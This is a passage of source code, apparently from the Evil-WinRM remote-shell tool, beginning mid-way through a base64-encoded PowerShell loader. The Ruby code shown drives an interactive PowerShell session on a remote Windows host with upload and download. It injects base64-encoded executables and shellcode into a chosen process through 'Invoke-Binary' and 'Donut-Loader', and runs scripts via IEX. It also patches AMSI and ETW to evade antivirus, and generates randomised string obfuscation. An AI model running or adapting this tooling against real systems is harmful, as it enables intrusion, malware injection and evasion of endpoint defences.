gMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMApbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRieXRlcykgfCBPdXQtTnVsbAokYmFzZTY0ID0gJGRvbnV0ZmlsZQpbYXJyYXldJGFycmF5ID0gJHByb2Nlc3NfaWQsJEJhc2U2NApbU2hlbGxjb2RlVGVzdC5Qcm9ncmFtXTo6TWFpbigkYXJyYXkpCn0KfQ==') 1124 | menu = get_menu 1125 | command = '' 1126 | 1127 | begin 1128 | time = Time.now.to_i 1129 | print_message('Establishing connection to remote endpoint', TYPE_INFO) 1130 | $conn.shell(:powershell) do |shell| 1131 | begin 1132 | completion = proc do |str| 1133 | case 1134 | when Readline.line_buffer =~ /help.*/i 1135 | puts($LIST.join("\t").to_s) 1136 | when Readline.line_buffer =~ /Invoke-Binary.*/i 1137 | result = @executables.grep(/^#{Regexp.escape(str)}/i) || [] 1138 | if result.empty? 1139 | paths = self.paths(str) 1140 | result.concat(paths.grep(/^#{Regexp.escape(str)}/i)) 1141 | end 1142 | result.uniq 1143 | when Readline.line_buffer =~ /donutfile.*/i 1144 | paths = self.paths(str) 1145 | paths.grep(/^#{Regexp.escape(str)}/i) 1146 | when Readline.line_buffer =~ /Donut-Loader -process_id.*/i 1147 | $DONUTPARAM2.grep(/^#{Regexp.escape(str)}/i) unless str.nil? 1148 | when Readline.line_buffer =~ /Donut-Loader.*/i 1149 | $DONUTPARAM1.grep(/^#{Regexp.escape(str)}/i) unless str.nil? 1150 | when Readline.line_buffer =~ /^upload.*/i 1151 | test_s = Readline.line_buffer.gsub('\\ ', '\#\#\#\#') 1152 | if test_s.count(' ') < 2 1153 | self.paths(str) || [] 1154 | else 1155 | complete_path(str, shell) || [] 1156 | end 1157 | when Readline.line_buffer =~ /^download.*/i 1158 | test_s = Readline.line_buffer.gsub('\\ ', '\#\#\#\#') 1159 | if test_s.count(' ') < 2 1160 | complete_path(str, shell) || [] 1161 | else 1162 | self.paths(str) || [] 1163 | end 1164 | when (Readline.line_buffer.empty? || !(Readline.line_buffer.include?(' ') || Readline.line_buffer =~ %r{^"?(\./|\.\./|[a-z,A-Z]:/|~/|/)})) 1165 | result = $COMMANDS.grep(/^#{Regexp.escape(str)}/i) || [] 1166 | result.concat(@functions.grep(/^#{Regexp.escape(str)}/i)) 1167 | result.uniq 1168 | else 1169 | result = [] 1170 | result.concat(complete_path(str, shell) || []) 1171 | result 1172 | end 1173 | end 1174 | 1175 | Readline.completion_proc = completion 1176 | Readline.completion_append_character = '' 1177 | Readline.completion_case_fold = true 1178 | Readline.completer_quote_characters = '"' 1179 | 1180 | # Configure Ctrl+L to clear screen 1181 | if Readline.respond_to?(:emacs_editing_mode) 1182 | Readline.emacs_editing_mode 1183 | end 1184 | 1185 | # Set up Ctrl+L binding to clear screen 1186 | begin 1187 | if Readline.respond_to?(:bind_key) 1188 | Readline.bind_key("\C-l") do 1189 | clear_screen 1190 | Readline.refresh_line 1191 | nil 1192 | end 1193 | end 1194 | rescue => e 1195 | # If binding fails, Ctrl+L will work at terminal level 1196 | end 1197 | 1198 | # Load history for this host/user 1199 | load_history 1200 | 1201 | until command == 'exit' do 1202 | begin 1203 | pwd = shell.run('(get-location).path').output.strip 1204 | rescue => e 1205 | # Handle connection/timeout errors when getting pwd 1206 | error_msg = e.message.to_s.downcase 1207 | if error_msg.include?('timeout') || error_msg.include?('connection') || 1208 | error_msg.include?('closed') || error_msg.include?('broken') || 1209 | e.class.to_s.include?('Timeout') || e.class.to_s.include?('Connection') 1210 | puts 1211 | print_message("Connection timeout or error occurred: #{e.class} - #{e.message}", TYPE_ERROR, true, $logger) 1212 | print_message("Cleaning up and exiting...", TYPE_WARNING, true, $logger) 1213 | # Clean up KRB5CCNAME before exiting 1214 | begin 1215 | if defined?($original_krb5ccname) && !$original_krb5ccname.nil? 1216 | ENV['KRB5CCNAME'] = $original_krb5ccname 1217 | elsif defined?($original_krb5ccname) && $original_krb5ccname.nil? 1218 | ENV.delete('KRB5CCNAME') if ENV.key?('KRB5CCNAME') 1219 | end 1220 | rescue => cleanup_error 1221 | # Ignore cleanup errors 1222 | end 1223 | custom_exit(1, false) 1224 | else 1225 | # For other errors, try to continue with a default pwd 1226 | pwd = "C:\\" 1227 | end 1228 | end 1229 | 1230 | if $colors_enabled 1231 | command = Readline.readline( "#{colorize('*Evil-WinRM*', 'red')}#{colorize(' PS ', 'yellow')}#{pwd}> ", true) 1232 | else 1233 | command = Readline.readline("*Evil-WinRM* PS #{pwd}> ", true) 1234 | end 1235 | 1236 | # Handle Ctrl+L if it returns as empty or special character 1237 | if command == "\f" || (command.nil? && Readline.line_buffer.empty?) 1238 | clear_screen 1239 | command = '' 1240 | next 1241 | end 1242 | 1243 | # Save command to history file 1244 | save_to_history(command) if command && !command.strip.empty? 1245 | 1246 | $logger&.info("*Evil-WinRM* PS #{pwd} > #{command}") 1247 | 1248 | if command.start_with?('upload') 1249 | if docker_detection 1250 | print_message('Remember that in docker environment all local paths should be at /data and it must be mapped correctly as a volume on docker run command', TYPE_WARNING, true, $logger) 1251 | end 1252 | begin 1253 | source_s = "" 1254 | dest_s = "" 1255 | paths = get_paths_from_command(command, pwd) 1256 | 1257 | if paths.length == 2 1258 | dest_s = paths.pop 1259 | source_s = paths.pop 1260 | elsif paths.length == 1 1261 | source_s = paths.pop 1262 | end 1263 | 1264 | # Resolve relative paths correctly, including paths with ../ 1265 | unless source_s.match(/^[a-zA-Z]:[\\\/]/) || source_s.match(/^\/\//) 1266 | # If it's a relative path, expand it from current directory 1267 | source_s = File.expand_path(source_s, Dir.pwd) 1268 | end 1269 | 1270 | source_expr_i = source_s.index(/(\*\.|\*\*|\.\*|\*)/) || -1 1271 | 1272 | if dest_s.empty? 1273 | if source_expr_i == -1 1274 | dest_s = "#{pwd}\\#{extract_filename(source_s)}" 1275 | else 1276 | index_last_folder = source_s.rindex(/[\/]/, source_expr_i ) 1277 | dest_s = pwd 1278 | end 1279 | end 1280 | 1281 | unless dest_s.match(/^[a-zA-Z]:[\\\/]/) then 1282 | dest_s = "#{pwd}\\#{dest_s.gsub(/^([\\\/]|\.\/)/, '')}" 1283 | end 1284 | 1285 | if extract_filename(source_s).empty? 1286 | print_message("A filename must be specified!", TYPE_ERROR, true, $logger) 1287 | else 1288 | source_s = source_s.gsub("\\", "/") unless Gem.win_platform? 1289 | dest_s = dest_s.gsub("/", "\\") 1290 | sources = [] 1291 | 1292 | if source_expr_i == -1 1293 | # Validate file exists and is readable before upload 1294 | unless File.exist?(source_s) 1295 | raise "Source file does not exist: #{source_s}" 1296 | end 1297 | unless File.readable?(source_s) 1298 | raise "Source file is not readable: #{source_s}" 1299 | end 1300 | sources.push(source_s) 1301 | else 1302 | Dir[source_s].each do |filename| 1303 | sources.push(filename) if File.exist?(filename) && File.readable?(filename) 1304 | end 1305 | if sources.length > 0 1306 | shell.run("mkdir #{dest_s} -ErrorAction SilentlyContinue") 1307 | else 1308 | raise "There are no files to upload at #{source_s}" 1309 | end 1310 | end 1311 | 1312 | print_message("Uploading #{source_s} to #{dest_s}", TYPE_INFO, true, $logger) 1313 | upl_result = file_manager.upload(sources, dest_s) do |bytes_copied, total_bytes, x, y| 1314 | progress_bar(bytes_copied, total_bytes) 1315 | if bytes_copied == total_bytes 1316 | print_message("#{bytes_copied} bytes of #{total_bytes} bytes copied", TYPE_DATA, true, $logger) 1317 | end 1318 | end 1319 | print_message('Upload successful!', TYPE_INFO, true, $logger) 1320 | end 1321 | rescue StandardError => e 1322 | $logger.info("#{e}: #{e.backtrace}") unless $logger.nil? 1323 | print_message('Upload failed. Check filenames or paths: ' + e.to_s, TYPE_ERROR, true, $logger) 1324 | ensure 1325 | command = '' 1326 | end 1327 | elsif command.start_with?('download') 1328 | if docker_detection 1329 | print_message('Remember that in docker environment all local paths should be at /data and it must be mapped correctly as a volume on docker run command', TYPE_WARNING, true, $logger) 1330 | end 1331 | begin 1332 | dest = "" 1333 | source = "" 1334 | paths = get_paths_from_command(command, pwd) 1335 | 1336 | if paths.length == 2 1337 | dest = paths.pop 1338 | source = paths.pop 1339 | else 1340 | source = paths.pop 1341 | dest = "" 1342 | end 1343 | 1344 | if source.match(/^\.[\\\/]/) 1345 | source = source.gsub(/^\./, "") 1346 | end 1347 | unless source.match(/^[a-zA-Z]:[\\\/]/) then 1348 | source = pwd + '\\' + source.gsub(/^[\\\/]/, '') 1349 | end 1350 | 1351 | source_expr_i = source.index(/(\*\.|\*\*|\.\*|\*)/) || -1 1352 | if dest.empty? 1353 | if source_expr_i == -1 1354 | dest = "#{extract_filename(source)}" 1355 | else 1356 | index_last_folder = source.rindex(/[\\\/]/, source_expr_i) 1357 | dest = "#{extract_filename(source[0..index_last_folder])}" 1358 | end 1359 | end 1360 | 1361 | if dest.match?(/^(\.[\\\/]|\.)$/) 1362 | dest = "#{extract_filename(source)}" 1363 | end 1364 | 1365 | if extract_filename(source).empty? 1366 | print_message("A filename or folder must be specified!", TYPE_ERROR, true, $logger) 1367 | else 1368 | size = filesize(shell, source) 1369 | source = source.gsub("/", "\\") if Gem.win_platform? 1370 | dest = dest.gsub("\\", "/") unless Gem.win_platform? 1371 | print_message("Downloading #{source} to #{dest}", TYPE_INFO, true, $logger) 1372 | downloaded = file_manager.download(source, dest, size: size) do |index, size| 1373 | progress_bar(index, size) 1374 | end 1375 | if downloaded != false 1376 | print_message('Download successful!', TYPE_INFO, true, $logger) 1377 | else 1378 | print_message('Download failed. Check filenames or paths', TYPE_ERROR, true, $logger) 1379 | end 1380 | end 1381 | rescue StandardError => e 1382 | print_message('Download failed. Check filenames or paths: ' + e.to_s, TYPE_ERROR, true, $logger) 1383 | ensure 1384 | command = '' 1385 | end 1386 | elsif command.start_with?('Invoke-Binary') 1387 | begin 1388 | invoke_Binary = command.tokenize 1389 | command = '' 1390 | if !invoke_Binary[1].to_s.empty? 1391 | load_executable = invoke_Binary[1] 1392 | load_executable = File.binread(load_executable) 1393 | load_executable = Base64.strict_encode64(load_executable) 1394 | if !invoke_Binary[2].to_s.empty? 1395 | output = shell.run("Invoke-Binary #{load_executable} ,#{invoke_Binary[2]}") 1396 | puts(output.output) 1397 | elsif invoke_Binary[2].to_s.empty? 1398 | output = shell.run("Invoke-Binary #{load_executable}") 1399 | puts(output.output) 1400 | end 1401 | elsif (output = shell.run('Invoke-Binary')) 1402 | puts(output.output) 1403 | end 1404 | rescue StandardError => e 1405 | print_message('Check filenames', TYPE_ERROR, true, $logger) 1406 | end 1407 | elsif command.start_with?('Donut-Loader') 1408 | begin 1409 | donut_Loader = command.tokenize 1410 | command = '' 1411 | unless donut_Loader[4].to_s.empty? then 1412 | pid = donut_Loader[2] 1413 | load_executable = donut_Loader[4] 1414 | load_executable = File.binread(load_executable) 1415 | load_executable = Base64.strict_encode64(load_executable) 1416 | output = shell.run("Donut-Loader -process_id #{pid} -donutfile #{load_executable}") 1417 | else 1418 | output = shell.run("Donut-Loader") 1419 | end 1420 | print(output.output) 1421 | $logger&.info(output.output) 1422 | rescue StandardError 1423 | print_message('Check filenames', TYPE_ERROR, true, $logger) 1424 | end 1425 | elsif command.start_with?('services') 1426 | command = '' 1427 | output = shell.run('$servicios = Get-ItemProperty "registry::HKLM\System\CurrentControlSet\Services\*" | Where-Object {$_.imagepath -notmatch "system" -and $_.imagepath -ne $null } | Select-Object pschildname,imagepath ; foreach ($servicio in $servicios ) {Get-Service $servicio.PSChildName -ErrorAction SilentlyContinue | Out-Null ; if ($? -eq $true) {$privs = $true} else {$privs = $false} ; $Servicios_object = New-Object psobject -Property @{"Service" = $servicio.pschildname ; "Path" = $servicio.imagepath ; "Privileges" = $privs} ; $Servicios_object }') 1428 | print(output.output.chomp) 1429 | $logger&.info(output.output.chomp) 1430 | elsif command.start_with?(*@functions) 1431 | silent_warnings do 1432 | load_script = $scripts_path + command 1433 | command = '' 1434 | load_script = load_script.gsub(' ', '') 1435 | load_script = File.binread(load_script) 1436 | load_script = Base64.strict_encode64(load_script) 1437 | script_split = load_script.scan(/.{1,5000}/) 1438 | script_split.each do |item| 1439 | output = shell.run("$a += '#{item}'") 1440 | end 1441 | 1442 | output = shell.run("IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($a))).replace('???','')") 1443 | output = shell.run('$a = $null') 1444 | end 1445 | elsif command.start_with?('menu') 1446 | command = '' 1447 | silent_warnings do 1448 | if @Bypass_4MSI_loaded 1449 | unless @psLoaded 1450 | print_message("Bypass-4MSI is loaded. Trying to load utilities", TYPE_INFO, true, $logger) 1451 | shell.run(donuts) 1452 | shell.run(invokeBin) 1453 | shell.run(dllloader) 1454 | @psLoaded = true 1455 | end 1456 | end 1457 | outputs = load_powershell(shell, menu, 2) 1458 | puts(get_banner) 1459 | puts 1460 | output = shell.run($MENU_CMD) 1461 | autocomplete = output.output || "" 1462 | autocomplete = autocomplete.gsub!(/\r\n?/, "\n") 1463 | autocomplete = autocomplete || "" 1464 | assemblyautocomplete = shell.run($SHOW_GLOBAL_METHODS_CMD).output.chomp 1465 | assemblyautocomplete = assemblyautocomplete.gsub!(/\r\n?/, "\n") 1466 | unless assemblyautocomplete.to_s.empty? 1467 | $LISTASSEMNOW = assemblyautocomplete.split("\n") 1468 | $LISTASSEM = $LISTASSEM + $LISTASSEMNOW 1469 | end 1470 | $LIST2 = autocomplete.split("\n") 1471 | $LIST = $LIST + $LIST2 1472 | $COMMANDS = $COMMANDS + $LIST2 1473 | $COMMANDS = $COMMANDS.uniq 1474 | cmdlets = "" 1475 | if !$LIST2.nil? && !$LIST2.empty? 1476 | cmdlets = '[+] ' + $LIST2.join("\n").gsub(/\n/,"\n[+] ") + "\n" 1477 | end 1478 | message_output = cmdlets + '[+] ' + $CMDS.join("\n").gsub(/\n/,"\n[+] ") + "\n\n" 1479 | puts(message_output) 1480 | $logger&.info(message_output) 1481 | end 1482 | elsif command == 'Bypass-4MSI' 1483 | command = '' 1484 | timeToWait = (time + 20) - Time.now.to_i 1485 | if timeToWait.positive? 1486 | print_message('AV could be still watching for suspicious activity. Waiting for patching...', TYPE_WARNING, true, $logger) 1487 | sleep(timeToWait) 1488 | end 1489 | unless @Bypass_4MSI_loaded 1490 | load_Bypass_4MSI(shell) 1491 | load_ETW_patch(shell) 1492 | @Bypass_4MSI_loaded = true 1493 | end 1494 | elsif command.strip.downcase == 'clear' || command.strip.downcase == 'cls' 1495 | command = '' 1496 | clear_screen 1497 | end 1498 | 1499 | begin 1500 | output = shell.run(command) do |stdout, stderr| 1501 | stdout&.each_line do |line| 1502 | $stdout.puts(line.rstrip) 1503 | end 1504 | $stderr.print(stderr) 1505 | end 1506 | 1507 | next unless !$logger.nil? && !command.empty? 1508 | output_logger = '' 1509 | output.output.each_line do |line| 1510 | output_logger += "#{line.rstrip!}\n" 1511 | end 1512 | $logger.info(output_logger) 1513 | rescue => e 1514 | # Handle connection/timeout errors gracefully 1515 | error_msg = e.message.to_s.downcase 1516 | if error_msg.include?('timeout') || error_msg.include?('connection') || 1517 | error_msg.include?('closed') || error_msg.include?('broken') || 1518 | e.class.to_s.include?('Timeout') || e.class.to_s.include?('Connection') 1519 | puts 1520 | print_message("Connection timeout or error occurred: #{e.class} - #{e.message}", TYPE_ERROR, true, $logger) 1521 | print_message("Cleaning up and exiting...", TYPE_WARNING, true, $logger) 1522 | # Clean up KRB5CCNAME before exiting 1523 | begin 1524 | if defined?($original_krb5ccname) && !$original_krb5ccname.nil? 1525 | ENV['KRB5CCNAME'] = $original_krb5ccname 1526 | elsif defined?($original_krb5ccname) && $original_krb5ccname.nil? 1527 | ENV.delete('KRB5CCNAME') if ENV.key?('KRB5CCNAME') 1528 | end 1529 | rescue => cleanup_error 1530 | # Ignore cleanup errors 1531 | end 1532 | custom_exit(1, false) 1533 | else 1534 | # Re-raise other errors 1535 | raise 1536 | end 1537 | end 1538 | end 1539 | rescue Errno::EACCES => e 1540 | puts 1541 | print_message("An error of type #{e.class} happened, message is #{e.message}", TYPE_ERROR, true, $logger) 1542 | retry 1543 | rescue Interrupt 1544 | puts 1545 | print_message('Press "y" to exit, press any other key to continue', TYPE_WARNING, true, $logger) 1546 | if $stdin.getch.downcase == 'y' 1547 | custom_exit(130) 1548 | else 1549 | retry 1550 | end 1551 | end 1552 | 1553 | custom_exit(0) 1554 | end 1555 | rescue SystemExit 1556 | rescue SocketError 1557 | print_message("Check your /etc/hosts file to ensure you can resolve #{$host}", TYPE_ERROR, true, $logger) 1558 | custom_exit(1) 1559 | rescue Exception => e 1560 | # Check if it's a Kerberos ticket expired error 1561 | error_class = e.class.to_s 1562 | error_message = e.message.to_s 1563 | 1564 | # Detect GSSAPI/GSS errors related to expired tickets 1565 | error_message_lower = error_message.downcase 1566 | is_gss_error = (error_class.include?('GSSAPI') || error_class.include?('GssApi') || error_class.include?('GSS')) 1567 | is_expired_error = (error_message_lower.include?('ticket expired') || 1568 | (error_message_lower.include?('expired') && error_message_lower.include?('ticket')) || 1569 | (error_message_lower.include?('kerberos') && error_message_lower.include?('expired'))) 1570 | 1571 | if is_gss_error && is_expired_error 1572 | print_message("Kerberos ticket expired. The ticket file provided is no longer valid. Please generate a new Kerberos ticket and try again.", TYPE_ERROR, true, $logger) 1573 | # Clean up KRB5CCNAME before exiting 1574 | begin 1575 | if defined?($original_krb5ccname) && !$original_krb5ccname.nil? 1576 | ENV['KRB5CCNAME'] = $original_krb5ccname 1577 | elsif defined?($original_krb5ccname) && $original_krb5ccname.nil? 1578 | ENV.delete('KRB5CCNAME') if ENV.key?('KRB5CCNAME') 1579 | end 1580 | rescue => cleanup_error 1581 | # Ignore cleanup errors 1582 | end 1583 | custom_exit(1, false) 1584 | else 1585 | print_message("An error of type #{e.class} happened, message is #{e.message}", TYPE_ERROR, true, $logger) 1586 | custom_exit(1) 1587 | end 1588 | end 1589 | end 1590 | 1591 | def get_banner 1592 | Base64.decode64('DQoNCiAgICwuICAgKCAgIC4gICAgICApICAgICAgICAgICAgICAgIiAgICAgICAgICAgICwuICAgKCAgIC4gICAgICApICAgICAgIC4gICANCiAgKCIgICggICkgICknICAgICAsJyAgICAgICAgICAgICAoYCAgICAgJ2AgICAgKCIgICAgICkgICknICAgICAsJyAgIC4gICwpICANCi47ICkgICcgKCggKCIgKSAgICA7KCwgICAgICAuICAgICA7KSAgIiAgKSIgIC47ICkgICcgKCggKCIgKSAgICk7KCwgICApKCggICANCl8iLixfLC5fXykuLCkgKC4uXyggLl8pLCAgICAgKSAgLCAoLl8uLiggJy4uXyIuXywgLiAnLl8pXyguLixfKF8iLikgXyggXycpICANClxfICAgX19fX18vX18gIF98X198ICB8ICAgICgoICAoICAvICBcICAgIC8gIFxfX3wgX19fX1xfX19fX18gICBcICAvICAgICBcICANCiB8ICAgIF9fKV9cICBcLyAvICB8ICB8ICAgIDtfKV8nKSBcICAgXC9cLyAgIC8gIHwvICAgIFx8ICAgICAgIF8vIC8gIFwgLyAgXCANCiB8ICAgICAgICBcXCAgIC98ICB8ICB8X18gL19fX19fLyAgXCAgICAgICAgL3wgIHwgICB8ICBcICAgIHwgICBcLyAgICBZICAgIFwNCi9fX19fX19fICAvIFxfLyB8X198X19fXy8gICAgICAgICAgIFxfXy9cICAvIHxfX3xfX198ICAvX19fX3xfICAvXF9fX198X18gIC8NCiAgICAgICAgXC8gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgXC8gICAgICAgICAgXC8gICAgICAgXC8gICAgICAgICBcLw0KDQogICAgICAgQnk6IEN5YmVyVmFjYSwgT3NjYXJBa2FFbHZpcywgSmFyaWxhb3MsIEFyYWxlNjEgQEhhY2twbGF5ZXJzDQo=') 1593 | end 1594 | 1595 | def random_string(len = 3) 1596 | Array.new(len) { [*'0'..'9', *'A'..'Z', *'a'..'z'].sample }.join 1597 | end 1598 | 1599 | def random_case(word) 1600 | word.chars.map { |c| (rand 2).zero? ? c : c.upcase }.join 1601 | end 1602 | 1603 | def get_char_expresion(the_char) 1604 | rand_val = rand(10_000) + rand(100) 1605 | val = the_char.ord + rand_val 1606 | char_val = random_case('char') 1607 | 1608 | "[#{char_val}](#{val}-#{rand_val})" 1609 | end 1610 | 1611 | def get_byte_expresion(the_char) 1612 | rand_val = rand(30..120) 1613 | val = the_char.ord + rand_val 1614 | char_val = random_case('char') 1615 | byte_val = random_case('byte') 1616 | 1617 | "[#{char_val}]([#{byte_val}] 0x#{val.to_s(16)}-0x#{rand_val.to_s(16)})" 1618 | end 1619 | 1620 | def get_char_raw(the_char) 1621 | "\"#{the_char}\"" 1622 | end 1623 | 1624 | def generate_random_type_string(to_randomize) 1625 | result = '' 1626 | to_randomize.chars.each { |c| result += "+#{(rand 2) == 0 ? (rand 2) == 0 ? self.get_char_expresion(c): self.get_byte_expresion(c) : self.get_char_expresion(c)}"} 1627 | result[1..-1] 1628 | end 1629 | 1630 | def replace_placeholder(template, placeholder, str_value) 1631 | result = template.gsub(placeholder, str_value) 1632 | result 1633 | end 1634 | 1635 | def replace_placeholder_string(template, placeholder, str_value) 1636 | result = replace_placeholder(template, placeholder, generate_random_type_string(str_value)) 1637 | result 1638 | end 1639 | 1640 | def replace_placeholder_var(template, var_placeholder) 1641 | var_name = random_string((5..21).to_a.sample) 1642 | result = replace_placeholder(template, var_placeholder, var_name) 1643 | result 1644 | end 1645 | 1646 | def replace_func_var_name(template, function_name, replace_with) 1647 | if replace_with.length == 0 1648 | replace_with = random_string((15..32).to_a.sample) 1649 | end 1650 | a_mark = ">><" 1651 | func_placeholder = "#{a_mark}#{function_name}#{a_mark}" 1652 | result = replace_placeholder(template, func_placeholder, replace_with) 1653 | result 1654 | end 1655 | 1656 | def replace_string_scan_part(template, begin_i, end_i, mark) 1657 | to_replace = template[begin_i..end_i] 1658 | to_place = to_replace.gsub(mark, "") 1659 | first_t = false 1660 | result = "" 1661 | to_place.split("|").each do |word| 1662 | if ! first_t 1663 | first_t = true 1664 | result += generate_random_type_string(word) 1665 | else 1666 | result += "+\"|\"+" + generate_random_type_string(word) 1667 | end 1668 | 1669 | end 1670 | template.gsub!(to_replace, result) 1671 | end 1672 | 1673 | def replace_with_string_scan(template) 1674 | result = template 1675 | a_mark = "<><" 1676 | begin_i = 